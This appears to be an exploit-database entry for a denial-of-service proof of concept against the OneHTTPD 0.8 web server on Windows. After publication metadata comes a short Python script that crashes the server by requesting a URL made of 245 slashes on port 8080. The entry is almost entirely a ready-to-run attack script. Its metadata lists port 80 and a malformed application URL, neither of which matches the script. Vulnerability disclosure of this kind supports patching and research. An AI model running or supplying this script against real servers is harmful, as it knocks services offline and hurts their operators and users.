OneHTTPD 0.8 - Crash (PoC)

Author: Mahmod Mahajna (Mahy)
type: dos
platform: windows
port: 80.0
date_added: 2014-02-08  
date_updated: 2014-02-08  
verified: 0  
codes: OSVDB-96329  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comonehttpd-0.8.exe  

raw file: 31522.py  
# Exploit Title: onehttpd 0.8 Crash PoC
# Date: Feb 7,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 0.8
# Software Link: https://onehttpd.googlecode.com/files/onehttpd-0.8.exe
# Tested on: Windows XP SP3
# Email: m.dofo123@gmail.com
from requests import get,ConnectionError as cerror
from sys import argv
if(len(argv)!=2):
  print '%s host' % argv[0]
else:
  buff = '/'*245
  script,host=argv
  try:
    get('http://'+host+':8080/'+buff)
  except cerror:
    exit(1)